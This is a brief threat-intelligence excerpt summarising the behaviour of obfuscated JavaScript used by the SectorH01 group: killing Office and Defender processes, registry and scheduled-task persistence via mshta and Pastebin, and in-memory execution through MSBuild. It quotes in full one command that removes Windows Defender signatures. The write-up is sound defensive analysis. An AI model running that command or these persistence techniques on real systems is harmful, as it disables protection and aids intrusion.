After looking at the various scripts used, we observed these obfuscated JavaScript code mainly serving one or more of these purposes:
Terminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
Interfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
Setting Registry Autorun Persistence to execute mshta.exe on a Pastebin url
Setting Scheduled Task Persistence to execute mshta.exe on a Pastebin url
Executing malware in memory, sometimes in Microsoft’s .NET MSBuild.exe
In most cases, SectorH01 group in fact performed all of the above and sometimes multiple of the above by stacking multiple Pastebin urls and multiple commands in a single url. Moreover, since SectorH01 group is using the “Hagga” Pastebin account which has the ability to perform edits on the user’s pastes, they at times modify the paste to perform different actions.
To read the complete article see:
https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/
